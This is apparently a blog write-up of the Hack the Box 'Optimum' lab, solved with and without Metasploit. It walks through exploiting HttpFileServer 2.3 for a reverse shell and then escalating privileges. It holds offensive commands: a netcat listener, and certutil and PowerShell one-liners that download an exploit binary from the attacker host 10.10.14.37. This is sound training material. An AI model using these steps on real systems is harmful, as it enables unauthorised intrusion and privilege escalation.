Hack the Box — Optimum
With and Without Metasploit
Originally, I solved this box as part of the TCM Security Practical Ethical Hacking course with Metasploit but Heath, the instructor, did mention going back to solve it manually would be good practice. Whelp since the OSCP only lets one Metasploit use, I figure let me get into the practice of doing boxes without it. This box is also on the TJ Null List.
Recon
1
nmap -sC -sV -O -oA nmap/initial 10.10.10.8
1
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.8
1
nmap -sU -O -p- -oA nmap/udp 10.10.10.8
Enum
Google it…
Exploitable! We find https://www.exploit-db.com/exploits/39161
Exploitation With Metasploit
Find exploit for HttpFileServer 2.3
Configure the Options
There’s a Difference in Architecture between the box and our meterpreter session
But that doesn’t seem to affect our exploitation
Possible because Metasploit is auto-detecting the target
Privilege Escalation
I background the first meterpreter session and search for suggested post-breach exploits
The only option that needs to be configured here is the session
If sessions aren’t know you can just run show sessions
Once the suggester runs, I find what I’m really looking for which is a way to privilege escalate from the “Kostas” user to the system authority/root
We get system authority from the exploit
Manual Exploitation
In order to use the exploit we found from google searching we must find netcat and copy it into our working folder so we can serve it
1
2
locate nc.exe
cp /usr/share/windows-binaries/nc.exe ~/HTB/Optimum-10.10.10.8
Start the HTTP server
1
python -m SimpleHTTPServer 80
Start a listener
1
nc -nlvp 5555
Download the exploit we found: https://www.exploit-db.com/exploits/39161
“searchsploit -m” makes it easy to download exploits from exploit-db
Edit the exploit with our details
Run the exploit
1
python 39161.py 10.10.10.8 80
Acquire shell on listening port
Get user flag
Priv Esc
I used https://github.com/Glyph-Research/Windows-Exploit-Suggester.git which as its name implies suggests exploits based on system info
Initially, I ran this based on the readme instructions:
1
pip install xlrd --upgrade
To install the dependencies and update them BUT it actually broke the exploit.
I kept getting this error:
The fix was to downgrade to the older version I had before:
1
pip install xlrd==1.2.0
Now that the dependency issue has been fixed let me go back and explain the preparation for the above command.
In order to prepare the database and system info I run systeminfo command using the foothold of the Kostas user
Copy the output of systeminfo into sysinfo.txt
Then I run the following to create that database .xls file
1
./windows-exploit-suggester.py --update
Once those two pieces are created I can run the suggester:
From here all I have to do is download the executable that has already been compiled and since I still have my python server up and running I put this .exe in the same folder so I can grab it with Kostas
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41020.exe
Go back to my Kostas shell and use certutil
1
certutil.exe -urlcache -f http://10.10.14.37:80/41020.exe toasted.exe
This can also be accomplished with PowerShell
1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:80/41020.exe', 'c:\Users\Public\Downloads\41020.exe')"
Once the exploit is run and the privileges have been escalated then getting the root flag is simple
Issues
Why was any of this possible? Both the foothold and privilege escalation were do to old, unpatched software. This box is old but has evergreen relevance because we are still facing issues in 2023 due to unpatched software and system components.